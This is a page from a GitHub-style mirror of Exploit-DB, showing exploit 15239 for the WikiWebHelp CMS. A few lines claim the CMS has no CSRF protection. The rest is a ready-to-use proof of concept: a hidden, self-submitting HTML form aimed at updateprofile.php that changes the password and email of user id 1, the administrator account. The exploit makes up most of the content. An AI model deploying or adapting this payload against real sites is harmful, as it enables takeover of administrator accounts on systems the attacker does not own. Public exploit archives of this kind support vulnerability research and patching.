bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/15239.html
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
761 B
HTML
Raw Blame History

#Blog: yoyahack.blogspot.com
#Site: foro.undersecurity.net
#Mail: yoyahack@undersecurity.net
#CMS: WikiWebHelp
The entire system is vulnerable to CSRF (Cross-site request forgery) since
this does not include a system to prevent CSRF attacks ...
Example
Change the password of users, including the administrator.
Exploit:
<form name="CSRF" method="post" action="
http://127.0.0.1/wwh/handlers/updateprofile.php?id=1">
<input type='hidden' name='pass' value='password'>
<input type='hidden' name='confirm' value='confirm_password'>
<input type='hidden' name='email' value='email'>
<input type='hidden' name='sub' value='on'>
<input type='hidden' name='id' value='1'>
<input type='hidden' name='subscribe' value='true'>
<script>document.CSRF.submit()</script>
Reference in a new issue View git blame Copy permalink